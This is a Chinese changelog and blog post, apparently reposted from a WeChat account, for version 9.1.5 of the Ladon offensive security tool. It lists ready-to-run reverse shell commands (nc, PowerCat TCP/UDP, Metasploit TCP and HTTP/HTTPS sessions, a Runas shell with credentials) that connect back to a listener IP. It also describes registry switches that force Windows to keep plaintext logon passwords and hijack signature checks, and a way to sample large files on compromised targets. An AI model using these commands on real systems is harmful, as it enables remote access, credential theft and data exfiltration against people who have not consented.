9.1.5更新日志
LadonGUI 9.1.5 20220418
[+]RevShell 反弹Shell命令生成(Ladon、NC、Perl、Bash、Python、PowerCat、Base64)
Ladon 9.1.5 20220408
[+]SetMzLogonPwd 修改注册表读取2012及后系统明文密码
[+]SetSignAuth 修改注册表劫持签名签证
[+]ReadFile 读取大文件前面指定长度内容(Ladon ReadFile c:k8.exe 1024K)
[u]sc 修复SC添加启动项指定路径Bug
读取大文件指定长度内容(Ladon ReadFile c:k8.exe 1024K)
实战中可能会遇到一些很大的文件,但是我们不知道此文件是否包含我们想要的数据,如数据库文件,数据量可能会很大,可能几G、几十G都有可能,上百G很少件,一般管理员为了速度快,也会优化成几十份几十G的文件。哪怕是一个文件10G,甚至才一两G,我们要落地才能确认的话,会很费时间,特别是目标网络或VPS网速不给力时,几分钟能搞定的事,我们得浪费几小时或几天,效率会非常低,最快确认内容的方法就是读取文件指定长度即可。实战读取单个30G文件也是秒开,很快就确认了MDF文件是否存储相关数据。文本文件返回明文内容,二进制文件,返回的可能是乱码,但问题不大,因为我们主要是要确定那些数据库或相关文件是否有关心的内容。
修改注册表读取2012及后系统明文密码
Usage: Ladon SetMzLogonPwd 1 开关1和0
修改注册表劫持签名签证
Usage: Ladon SetSignAuth 1 开关1和0
反弹Shell命令生成
虽然网上有很多文章或笔记,但有时候复制粘贴,网站可能会转义一些字符导致,复制的命令无法使用,就算能使用,也得替换IP和端口,有时测试某洞需要反弹,这条命令不行,又得换另外一条测试,折腾起来有点麻烦,为了方便,觉得还是有必要弄个生成器。麻烦的还有其它原因,如BASE64加密的BASH命令,替换完IP和端口还得加密,之前曾用的在线地址,TM的不能用,找到另外一个,生成的Payload不知道是那站点没添加引号还是被转义,导致无法使用。第一版(Ladon、NC、Perl、Bash、Python、PowerCat、Base64),后续会陆续完善添加各种反弹工具命令。
反弹TCP
Usage:
Ladon ReverseTcp ip port type
type: meter shell nc
监听nc shell
监听nc shell可用工具非常多,如NC、LadonGui、PowerCat、MSF等
nc -l -v -p 4444
LadonGui--Netcat--Listen
powercat -l -p 4444
反弹NC shell
Ladon ReverseTcp 192.168.1.8 4444 nc
LadonGui监听
常用NC监听
反弹MSF TCP Shell
Ladon ReverseTcp 192.168.1.8 4444 shell
反弹MSF TCP Meter
Ladon ReverseTcp 192.168.1.8 4444 meter
MSF成功反弹会话
反弹TCP/UDP (CMD & PowerShell)
Load PowerCat
Usage:
Reverse Tcp: Ladon PowerCat -r 192.168.1.110 4444 cmd
Reverse Tcp: Ladon PowerCat -r 192.168.1.110 4444 psh
Reverse Udp: Ladon PowerCat -r 192.168.1.110 4444 cmd -u
Reverse Udp: Ladon PowerCat -r 192.168.1.110 4444 psh -u
反弹TCP,PowerCat监听执行PowerShell
反弹HTTP/HTTPS
Usage:
Ladon ReverseHttp ip port
Ladon ReverseHttps ip port
MSF监听
windows/meterpreter/reverse_http
windows/meterpreter/reverse_https
反弹MSF HTTPS Meter
Ladon ReverseTcp 192.168.1.8 4444 meter
反弹HTTPS
MSF HTTPS监听会话
Runas反弹
Ladon Runas k8gege k8gege520 cmd.exe 192.168.1.110 4444
更多命令使用9.1.5生成器,http://k8gege.org/Ladon/ReverseShell.html
原文始发于微信公众号(K8实验室):Ladon9.1.5大文件读取&反弹Shell生成器
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论